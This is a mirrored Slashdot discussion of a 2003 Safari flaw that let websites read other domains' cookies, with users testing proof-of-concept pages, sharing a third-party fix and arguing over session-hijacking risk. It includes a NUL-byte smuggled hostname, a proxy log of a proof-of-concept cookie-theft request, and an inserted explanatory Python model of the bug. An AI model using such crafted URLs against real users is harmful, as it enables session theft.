Slashdot Mirror


Safari Security Hole Allows Cookie Theft

An anonymous reader writes "MacSlash posted a story about a vulnerability in Safari. The exploit allows someone to steal any of your domain-based cookies (passwords, private info, etc.) from any website. Mozilla and Internet Explorer had the same bug in the past."

70 comments

  1. Sweet karma by Anonymous Coward · · Score: 0, Offtopic
    Now's your chance, Karma Whores. Cut and paste the highest-rated comments from the MacSlash discussion over here, and moderators who are too lazy to have RTFA will throw "+1, Insightful" mods at you for free.

    Of course, you then must live with being an utterly pathetic individual, but if you were considering doing something like this, it's probably too late to avoid that anyway.

    1. Re:Sweet karma by Anonymous Coward · · Score: 0, Insightful

      Too much effort - it's so much easier than that. Apple rules! They handled it better than MS would have! Now mod me up.

  2. One good reason... by BrokenHalo · · Score: 3, Funny

    to make a symlink from your cookies file to /dev/null. Who needs persistent cookies anyway?

    1. Re:One good reason... by Ianoo · · Score: 3, Informative

      I find them rather useful when you just have to get that first post on a Slashdot article but can't remember your password. See, if you'd had cookies enabled, you might well have made it in time!

      But seriously, I think cookies are a safe and generally useful concept. I have third-party cookies blocked since these can be downloaded with adverts and track you using the http-referer field. However, first party cookies are almost always safe.

      Not having to log in again at every single site just makes it easier, IMHO. I back up my cookie data more often than my bookmarks.

    2. Re:One good reason... by Anonymous Coward · · Score: 0

      Don't all real browsers have a "accept cookie for current session only" setting?

  3. Cookie theft? by Anonymous Coward · · Score: 0

    That's it! Every hacker is grounded for the rest of the day.

  4. I wonder. by dtfinch · · Score: 1, Interesting

    Might the Konqueror browser be affected by this?

    1. Re:I wonder. by Ianoo · · Score: 4, Informative

      Potentially, but I doubt it. The two browsers share a rendering engine, not much else. Cookies are purely a protocol issue, they add extra data when doing a GET/POST request on a web page. Nothing whatsoever to do with HTML rendering.

      Potentially a bug could exist in the Javascript engine, and since Javascript can access cookies, they could be stolen this way. However this particular bug doesn't appear to be JS-related, rather it's something more fundamental (but easily fixed by Apple, hopefully).

      Since Konqueror uses KDE/QT's socket classes, whilst Safari uses the Carbon/Darwin sockets interface, it's unlikely the bug would rear its head in Konqueror IMHO.

    2. Re:I wonder. by Anonymous Coward · · Score: 0

      why don't you get off your ass and try it, mr. +5 informative?

    3. Re:I wonder. by Ianoo · · Score: 1

      Because I use Epiphany on my PCs running Linux and don't have Konqueror installed?

  5. I do! by LittleBigLui · · Score: 0

    I'm a lazy bum you insensitive clod!

    --
    Free as in mason.
  6. Should watch similar products by shaka999 · · Score: 3, Insightful

    Just goes to show that companies should closely monitor security holes in competing products.

    --
    One should not theorize before one has data. -Sherlock Holmes-
  7. Cookie Theft by dpdawson · · Score: 5, Funny
    Marc Slemko: Apple stole the cookie from the cookie jar.

    Apple: Who me?

    Marc Slemko: Yes, you.

    Apple: Couldn't be.

    Marc Slemko: Then who?

    1. Re:Cookie Theft by Anonymous Coward · · Score: 3, Funny

      Apple: Bill Gates stole the cookie from the cookie jar.

      Slashdot: BURN HIM!

      MacSlash: BURN HIM!

      AppleLust: BURN HIM!

      Think Secret: BURN HIM!

      Steve Jobs: Tee hee. What a bunch of sheep.

    2. Re:Cookie Theft by TClevenger · · Score: 1, Offtopic

      Bastard! That song'll be in my head for a week!

  8. Safari and Konqueror by CliffH · · Score: 2, Redundant

    Just a quick question to throw out there.

    I know Safari uses KHTML as its rendering engine (ala Konqueror). How much more of the Konqueror code is used in Safari and could Konq possibly face this same issue and no one has stumbled on it? Forgive me if it's a stupid question, I've had about 2 hours sleep, my car broke down after taking my wife to work at 4am, and now I have to wait up because it's too late to get back to sleep before picking her up and waking up my son. Sounds like a lousy country song, huh. :)

    --
    sigs are like a box of chocolates, they all suck remove the underscores to email me
    1. Re:Safari and Konqueror by Ianoo · · Score: 1

      This is a repeat of the earlier parent on the same issue. See my comment here. Basically I'm pretty sure the answer is no.

    2. Re:Safari and Konqueror by CliffH · · Score: 1

      Sorry about that. :) As it was early early in the AM over here (NZ), I was typing kinda slow and started posting that when there were three posts up. I'm pretty sure you're right too. I think we would have heard about it by now if it were the case, but, to be on the safe side, we should all check out our Konqueror installations against any sites that test for it (I'd advise caution if you have any cookies saved with sensitive passwords for sensitive sites though). Now, I think I'm going to try and get some sleep. :)

      --
      sigs are like a box of chocolates, they all suck remove the underscores to email me
    3. Re:Safari and Konqueror by Ianoo · · Score: 1

      No worries, I didn't mean for you to get modded redundant, I just couldn't be bothered to type out or copy-n-paste the entire response again.

  9. Doesn't affect me? by Anonymous Coward · · Score: 4, Informative

    I am trying the "test" and all I get is:


    Please wait while loading the script

    You are stuck on this page ?
    It means that your browser is not vulnerable, sorry, or maybe, not so
    sorry, it's how the things should be !!!.
    You can press the back button now :)


    I am running Safari 1.1.1 (v100.1). Could it be because
    of This Hint?

    1. Re:Doesn't affect me? by goombah99 · · Score: 1

      I doubt that hint is the answer you think it is. they are talking about stealing your existing cookies. in the case of the test site i would imagine they are writing and then stealing back a test cookie. since this takes place all in one session the lock should be irrelevant.

      --
      Some drink at the fountain of knowledge. Others just gargle.
    2. Re:Doesn't affect me? by Anonymous Coward · · Score: 0

      I know what they are talking about. I went to some other sites, then verified that the sites had set some cookies by checking my Safari preferences. I then proceeded directly to the test page, and no matter which cookie I put in (yes, I am putting the dot in front of them, for example ".macosxhints.com" with or without quotes), every time I get that same message saying I am not voulnerable (sp?).

      As an aside, how come Safari isn't doing spell checking in this field? Isn't it supposed to?

    3. Re:Doesn't affect me? by Carthag · · Score: 1

      It doesn't affect me either (Safari 1.0 v85). I'm assuming this is because I have Privoxy running.

  10. Re:Frost Perst? by Anonymous Coward · · Score: 0

    Cookie monster wanted for questioning..

    Keebler stocks plummeted in the morning hours of the stock exchange; analysts predict it's going to get worse before it gets better.

  11. Fix it, but... what's the fuss? by jtheory · · Score: 4, Insightful

    The exploit allows someone to steal any of your domain-based cookies (passwords, private info, etc.) from any website.

    Any security hole should be fixed, but this is not as serious as they make it sound.

    Passwords? Private info? What serious web developer would keep these in a cookie? Cookies are not secure. They are stored unencrypted on the user's hard drive (where they are easily rifled through), and (as mentioned) there have been plenty of bugs in the past that have made their data accessible to John Q. Hacker.

    Cookies are mostly used for storing session ids, or another meaningless number that links back to the real info stored in a database on the server (yes, you don't want a hacker reading your session id, but this is a much lower risk).

    This is not just for security reasons -- it's because cookies are not reliable. Cookies get wiped out all the time (all browsers that I know of let you delete them, and I see lots of ads for software that offers to manage, delete, filter, or "clean them up" for me).

    Also, cookie size is limited (and does this differ on the diff browsers? I know GET request size does), so you could screw yourself over if you were storing a user's personal info and their address was really long.

    Why would you store username/password data in a cookie anyway? Most browsers do this for you now, *and* they are more secure about it. Hm.

    These are the best practices I was taught, at any rate. I didn't check slashcode before posting this... and I suppose it is true that best practices are not always followed.

    Does anyone have a real sense of how often sensitive data is stored unencrypted in a cookie?

    --
    There are only 10 types of people: those who understand decimal, those who don't, and, uh, 8 other types I forget.
    1. Re:Fix it, but... what's the fuss? by Taran · · Score: 5, Informative

      If the web app allows you to edit your information once you've acquired an authorized session, then stealing that authorized session could allow someone to hijack your information and/or your identity with that web app/company.

    2. Re:Fix it, but... what's the fuss? by Hanji · · Score: 1

      This is true, and is one of the reasons that this is indeed a potential problem, but nonetheless, for a well-designed session implementation, this should be a relatively small window of opportunity for a hacker to exploit. I'm not saying it can't be done, just that the risk isn't particularly huge, especially when you consider that, (as I understand it), this exploit only allows malicious code to access cookies from a domain that it requests, not to scan through all available cookies. In other words, hackers would have to guess a website that you have a sensitive cookie for, and then get to that site before the session expired.
      Possible? Sure
      Probable? Doubtful

      --
      A Minesweeper clone that doesn't suck
    3. Re:Fix it, but... what's the fuss? by frankie · · Score: 2, Interesting
      Passwords? Private info? What serious web developer would keep these in a cookie?

      Well... your Slashdot login is (hashed but stealable) in a cookie right now.

      javascript:alert(unescape(unescape(document.cookie)))
      Perhaps that doesn't qualify as "serious", but don't come crying to me when your karma bottoms out after "you" post 500 goatse trolls in a row.
    4. Re:Fix it, but... what's the fuss? by Ed+Avis · · Score: 1

      I've never understood why sites such as Slashdot want to use cookies for authorization... what's wrong with the standard username/password dialogue box that the browser is able to pop up and which servers like Apache easily support? That means a consistent user interface for logging in across sites, and if the user presses Cancel then he's taken to a sign-up page. The New York Times site seems to be one of the few that does this right.

      --
      -- Ed Avis ed@membled.com
    5. Re:Fix it, but... what's the fuss? by Anonymous Coward · · Score: 0

      Actually the gotcha is with Session Cookies :) Get one of these that isn't bound to a specific IP address and you can sometimes bypass the login to a web application.

      Then you can get to the personal information, the private information, etc...

      You're not very imaginative, I gather.

    6. Re:Fix it, but... what's the fuss? by Anonymous Coward · · Score: 0

      The New York Times doesn't use HTTP auth, last I checked. HTML forms and cookies, just like everyone else . . .

    7. Re:Fix it, but... what's the fuss? by Ed+Avis · · Score: 1

      Heh, shows how long it has been since I last visited their site and logged in... nowadays I don't bother unless someone finds the publicly-accessible link.

      --
      -- Ed Avis ed@membled.com
    8. Re:Fix it, but... what's the fuss? by fritz+il+gatto · · Score: 0

      Passwords? Private info? What serious web developer would keep these in a cookie? Slashdot, for example

  12. i new the cookie monster... by s33l3t · · Score: 1, Funny

    was real the first time i saw him on Sesame Street. everyone protect your cookies, ill bbl i need to find the count to make sure mine are all there.

    1. Re:i new the cookie monster... by Anonymous Coward · · Score: 0

      Practice your English more. You'll get there, I believe in you.

    2. Re:i new the cookie monster... by s33l3t · · Score: 0

      you are correct, thank you grammar nazi. proof reading == power.

  13. Another Hole... by Anonymous Coward · · Score: 2, Funny

    Apple needs to fix the disappearing laptop bug first. Every time I leave my laptop on a library desk and use the bathroom, my laptop is gone when I get back. Apple needs to fix this ASAP.

    1. Re:Another Hole... by valmont · · Score: 1
      Apple's Reply:
      Get a DELL, dude.
    2. Re:Another Hole... by Anonymous Coward · · Score: 0

      This is just another example of Apple's appalling lack of customer service. They SHOULD replace this, as soon as possible. After all we have been through to keep using Apple computers? Slights from our jealous friends. Incompatibilities with outdated and poorly managed corporate networks. The Humanity!

      And Apple should make sure all of your data is still on it as well.

      But no - now Apple is pulling a Microsoft... "No we won't replace your laptop that you ran over with your lawnmower..." What a disgrace...

  14. Re:http://www.broadcastadvertise.com/ by Anonymous Coward · · Score: 0

    WTF? I can't believe people are spamming Slashdot!

  15. That's not the biggest Safari bug by azav · · Score: 1

    Safari is horrible with regards to clearing cached items and gobbling up disk space.

    I have a gig free on my Ti and after a morning of browsing, it's down to 500Meg. Quitting Safari does not free up this space. Restarting does.

    One would expect Safari to be much better behaved, because when the hard drive fills up, other apps often lose their prefs and general hell breaks loose.

    REAL PITA.

    --
    - Zav - Imagine a Beowulf cluster of insensitive clods...
    1. Re:That's not the biggest Safari bug by Anonymous Coward · · Score: 4, Informative

      This isn't a Safari bug, this is how your OS deals with virtual memory.

      Look in /var/vm

      And you will see... swapfile1, swapfile2... etc. The OS creates these as needed.

      Now for the OS to recover swap space, there must be no pages addressed to a swap file. When you run Safari what gets paged out to disk? Not Safari, but all the other applications you are running. Therefore, quitting Safari does nothing. The OS won't page in the swap unless you need access to that page of memory.

    2. Re:That's not the biggest Safari bug by Hes+Nikke · · Score: 2, Informative

      hmmm...
      Safari -> Empty Cache

      or you could push cmd-option-E

      i think your gripe is more that you can't control the size of your cache, but some creative partitioning with a side of fstab could fix that :)

      my gripe is that safari doesn't seem to take advantage of the cache to the same extent that IE and Moz do, slowing down loading of mostly static pages and images

      but i still prefer it to any other browser out there :)

      --
      Don't call me back. Give me a call back. Bye. So yeah. But bye our, well, but alright we are on a shirt this chill.
    3. Re:That's not the biggest Safari bug by MalleusEBHC · · Score: 1

      You can also just logout/login. This will clear all user/non-system swapfiles.

    4. Re:That's not the biggest Safari bug by azav · · Score: 1

      Nice but that doesn't completely take care of the problem. I've got 467 Meg free now while I had a gig 30 mins ago. Ick.

      --
      - Zav - Imagine a Beowulf cluster of insensitive clods...
    5. Re:That's not the biggest Safari bug by Anonymous Coward · · Score: 0

      It's that 17meg file you're downloading. Try your Pentium 200...

  16. Symptom of underlying problem by TheLink · · Score: 2, Interesting

    The real problem seems to be using a programming language that uses null termination. When you allow "commands" and data to intermingle so closely you are inviting trouble.

    --
  17. Re:Sweet and sour karma by Anonymous Coward · · Score: 0

    Well, I don't frequent those pages so as far as I know this is my very own anonymously cowardly play on words

    Regarding the similar holes in other browsers:

    Those that don't learn from histories/cookies are bound to repeat them. Also, those that don't learn from histories/cookies are bound to repeat them.

  18. PATCHED ALREADY! by goombah99 · · Score: 1, Informative
    move along. no story here. Uh, hate to burst everyone's bubble but this is patched if you are using Safari version 1.1.1

    as long as I'm reposting things from MacSlash here's one: see for yourself by testing the exploit here.

    --
    Some drink at the fountain of knowledge. Others just gargle.
    1. Re:PATCHED ALREADY! by bill_mcgonigle · · Score: 2, Informative

      as long as I'm reposting things from MacSlash

      Hey, at least repost the right stuff. :)

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
    2. Re:PATCHED ALREADY! by valmont · · Score: 2, Interesting

      no it is not already patched. I am running Safari 1.1.1 (v100.1), and the insecure website's proof-of-concept DOES show me ALL cookies stored in the .ebay.com domain.

    3. Re:PATCHED ALREADY! by Squozen · · Score: 1

      Well, I'm running the latest Safari and gave this a test:

      ERROR

      The requested URL could not be retrieved

      While trying to process the request:
      GET http://www.insecure.ws%00.ebay.com/cgi-bin/cook HTTP/1.1
      Accept: */*
      Accept-Language: en, ja;q=0.92, ja-jp;q=0.96, fr;q=0.88, de-de;q=0.85, de;q=0.81, es;q=0.77, it-it;q=0.73, it;q=0.69, nl-nl;q=0.65, nl;q=0.62, sv-se;q=0.58, sv;q=0.54, no-no;q=0.50, no;q=0.46, da-dk;q=0.42, da;q=0.38, fi-fi;q=0.35, fi;q=0.31, pt-pt;q=0.27, pt;q=0.23
      Accept-Encoding: gzip, deflate;q=1.0, identity;q=0.5, *;q=0
      Referer: http://www.insecure.ws/cgi-bin/cookie?input=.ebay.com
      User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/103u (KHTML, like Gecko) Safari/100.1
      Connection: close
      Host: www.insecure.ws

      The following error was encountered:
      Invalid Request

      Some aspect of the HTTP Request is invalid. Possible problems:
      Missing or unknown request method
      Missing URL
      Missing HTTP Identifier (HTTP/1.0)
      Request is too large
      Content-Length missing for POST or PUT requests
      Illegal character in hostname; underscores are not allowed

      Your cache administrator is webmaster.

      Generated Sat, 22 Nov 2003 00:28:00 GMT by clavin.korangar.cable.nu (squid/2.5.STABLE4)


      Looks like Squid won't allow this malformed request through. Hurray for open source software!

    4. Re:PATCHED ALREADY! by andreMA · · Score: 1

      How many ebay cookies do you have? I got a vaguely similar error (not via squid) when tossing junk cookies from 2o7.net at it, but it was able to steal cookies when I chose another domain that had only set one cookie... consistent with the "Request too large" listed as a possible cause of the error.

  19. temporary patch by Anonymous Coward · · Score: 1, Informative
  20. Firebird by lordDallan · · Score: 1, Troll

    While you're waiting for Apple to patch this why not check out Mozilla Firebird 0.7 for OS X.

    It is a great, feature rich browser. Of course you could also check out Mozilla 1.5, Camino, Netscape, iCab, Omni Web, Opera, or even IE 5 or MSN for the Mac

    All of these can be downloaded from their respective sites, or from the Internet Utilities section of Apple's Mac OS X Downloads page.

  21. Cookie theft?! by Anonymous Coward · · Score: 1, Funny

    Oh no! Where's the key for the safe?! I don't want anybody taking my oreos!

  22. (Not) PATCHED ALREADY! by sld126 · · Score: 3, Interesting

    Safari 1.1.1 (v100.1)

    Still see my ebay cookies.

    Maybe you cleared your cookie cache or have accepting them turned off?

    --
    You're just jealous because the voices only talk to me.
  23. OmniWeb and KHTML by Lagos · · Score: 3, Informative

    First of all note that OmniWeb is not affected by this bug. Outside of a lack of tabs, it's a very good Web Browser that should satisfy you until Apple patches this bug. Of course, I'm sure the Slashdot readership is aware of other options as well.

    As for the discussion as to whether this is a bug in KHTML in general, it is not. The bug is in the way browsers parse the hostname out of a URL differently for cookies and the connection itself. So in Safari the url:

    http://www.EvilSite.com%00.amazon.com/

    will connect to www.EvilSite.com, but be considered in the domain of .amazon.com for the purpose of cookie security. This seems to be a bug in the code around KHTML, not KHTML itself, since vulnerable OmniWeb uses the same WebCore framework that is used by Safari without being vulnerable.
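    The parsing mismatch Lagos describes above (and TheLink's point in comment 16 about NUL termination) can be modelled in a few lines. This is an added example, not code from the thread, Safari or WebCore: two constructed "naive" host derivations that disagree on a %00 host, the cookie domain-match they feed, and a strict parser that validates the raw host before any decoding so both uses see the same name.

```python
"""Model of the host-parsing mismatch behind the Safari cookie bug.

Constructed illustration, not Safari/WebCore code. The "naive_*"
functions are hypothetical stand-ins for two code paths that derive a
hostname from the same URL in different ways.
"""
import re
from typing import Dict, Optional
from urllib.parse import urlsplit, unquote

# One DNS label: letters/digits, hyphens allowed inside, 1-63 chars.
LABEL_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def naive_connect_host(url: str) -> str:
    """Model of a C-string code path: percent-decode, then everything after
    the first NUL byte is invisible, so the TCP connection goes to the
    prefix (www.evilsite.com in the example from the comment)."""
    raw = urlsplit(url).hostname or ""
    return unquote(raw).split("\x00", 1)[0].lower()


def naive_cookie_domain(url: str) -> str:
    """Model of a length-aware code path: the whole decoded string is kept,
    so a suffix match against '.amazon.com' succeeds."""
    raw = urlsplit(url).hostname or ""
    return unquote(raw).lower()


def domain_matches(host: str, cookie_domain: str) -> bool:
    """Cookie domain-match: host equals the domain or is a subdomain of it."""
    dom = cookie_domain.lstrip(".").lower()
    return host == dom or host.endswith("." + dom)


def would_leak(url: str, cookie_domain: str) -> bool:
    """True when the cookie path scopes the request to cookie_domain while
    the connection path sends it to a different server."""
    conn = naive_connect_host(url)
    scope = naive_cookie_domain(url)
    return domain_matches(scope, cookie_domain) and not domain_matches(conn, cookie_domain)


def naive_attach(url: str, jar: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Cookies the mismatched browser would send (jar: domain -> cookies)."""
    scope = naive_cookie_domain(url)
    return {n: v for dom, c in jar.items() if domain_matches(scope, dom)
            for n, v in c.items()}


def strict_host(url: str) -> Optional[str]:
    """Hardened derivation: validate the raw, undecoded host as plain DNS
    labels and return one canonical host for both connecting and cookie
    scoping. None means the URL must be refused, not repaired."""
    raw = urlsplit(url).hostname or ""
    if not raw or "%" in raw or "\x00" in raw:
        return None
    if not all(LABEL_RE.match(label) for label in raw.split(".")):
        return None
    return raw.lower()


def strict_attach(url: str, jar: Dict[str, Dict[str, str]]) -> Optional[Dict[str, str]]:
    """Cookies a strict browser sends; None when the request is refused."""
    host = strict_host(url)
    if host is None:
        return None
    return {n: v for dom, c in jar.items() if domain_matches(host, dom)
            for n, v in c.items()}


if __name__ == "__main__":
    # Constructed cookie jar and the URL shape quoted in the comment above.
    jar = {".amazon.com": {"session": "s1"}, ".evilsite.com": {"track": "t1"}}
    url = "http://www.EvilSite.com%00.amazon.com/"
    print("connects to:", naive_connect_host(url))
    print("naive browser sends:", naive_attach(url, jar))   # amazon's cookie
    print("strict browser sends:", strict_attach(url, jar))  # None: refused
```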

  24. What about the CURRENT version of Safari? by hammarlund · · Score: 1, Interesting

    Does this affect the CURRENT version of Safari, v=1.1.1? I don't think so, since I tried the http://alive.znep.com/~marcs/security/mozillacookie/demo.html link and it didn't send anything back.

  25. Hash in your cookie by jtheory · · Score: 2, Interesting

    Heh, aren't brownies the more traditional medium?

    Anyway, my post did have the caveat that I did NOT review slashcode before posting.... Honestly, though, slashdot seems to be designed so that you can have as much security as you want, even if that cookie has a hash of sensitive data instead of a temporary session id.

    You can control whether your login (held in the cookie) lasts for the browser session only, vs. a whole year. You can also manually logout whenever you want (again, deletes the cookie).

    If you do either of those (and don't visit possible cracker-owned sites while you're logged in) you are perfectly safe, since the hacker won't ever be able to see the slashdot cookie.

    [I'm assuming that's a hash of the username AND password -- if it's only the username, that's insecure, since the cracker could just figure out the hash algorithm and make cookies from whatever username they wanted.]

    Slashdot is unusual in that we have that option (because Taco figures we'll understand it, I guess). In general, sites decide this for you, and don't allow "eternal login" if there's sensitive data at risk -- at most they will save your login name for you (but not the password).

    See? No goatse.

    --
    There are only 10 types of people: those who understand decimal, those who don't, and, uh, 8 other types I forget.
  26. But if you proxy... by sitharus · · Score: 2, Interesting

    I'm not vulnerable because Squid catches the URL and says 'NO! Bad!'. Using a proxy means the whole URL gets passed to the proxy, creating an error page.

    Still, irritating bug.

    --
    --sitharus
  27. Here is the fix for this exploit: by Giffut · · Score: 3, Informative

    http://hetima.com/soft/cookiemonsterfix.html Scroll down for the English explanations. But you also can proceed to download the DMG file itself, as substantial English documentation is included there. G

  28. Fix available : CookieMonsterFix ? by battambang · · Score: 1

    FYI, French mac site Macbidouille recommends a fix: CookieMonsterFix.
    I ran it against 10.2.8 + Safari 1.0.1 (v85.6) and it looks like it works. The readme says it works with Panther as well.

  29. 3rd Party Fix by stefanb · · Score: 3, Interesting
    This BugTraq post links to a Japanese page with a fix (English text at the bottom).

    I was a bit dubious at first, but the patch includes source code. I did install the supplied binary, though...

    What I'm really surprised about however is the fact that a) a third-party developer can fix a problem like this at all, and b) how easily the fix can be hooked into Safari. It appears that this OpenStep/Cocoa framework stuff is really flexible...

    Oh and yes, it does work!

    1. Re:3rd Party Fix by stefanb · · Score: 1
      I just went ahead and rebuilt it, and the binary is identical to the one that they ship:

      64446 18 /Library/InputManagers/CookieMonsterFix/CookieMonsterFix.bundle/Contents/MacOS/CookieMonsterFix
      64446 18 /Users/stb/working/cookiemonsterfix/build/CookieMonsterFix.bundle/Contents/MacOS/CookieMonsterFix

    2. Re:3rd Party Fix by Anonymous Coward · · Score: 0

      Not saying they aren't identical, but usually people use md5 instead of file sizes to confirm these things. man md5 to read more . . .

  30. Hmm. by jtheory · · Score: 1

    You're not very imaginative, I gather.

    Hey, now; be nice. I thought I talked about this somewhere, but here's more detail.

    You're right that session cookies are a security hole, but it's much harder to use them, because most of the time when you steal them they're useless. Sessions expire, or are closed on log-out.

    If you do your banking online, do you log out? Do you close the browser? Or do you even wait 15 minutes before browsing to the shadier parts of the internet? Any of those and you're safe.

    Here's what would have to happen for your banking session to be hijacked:
    1) You log into your bank.
    2) Without logging out or closing the browser first, you go to a hacker-controlled website.
    3) The hacker's code requests the cookie for yourbank.com -- it must grab the cookie for that exact domain name.
    4) The hacker, within the next 10-15 minutes, uses the cookie to jump into your logged-in session at yourbank.com.

    Not so easy. The big problem is how to get you to visit h4x0rh0m3.com with an active session cookie from a known site.

    And this is all assuming that yourbank.com doesn't do that extra check to see if your IP changes mid-session... and I'll bet most sites with dangerous access like that do.

    --
    There are only 10 types of people: those who understand decimal, those who don't, and, uh, 8 other types I forget.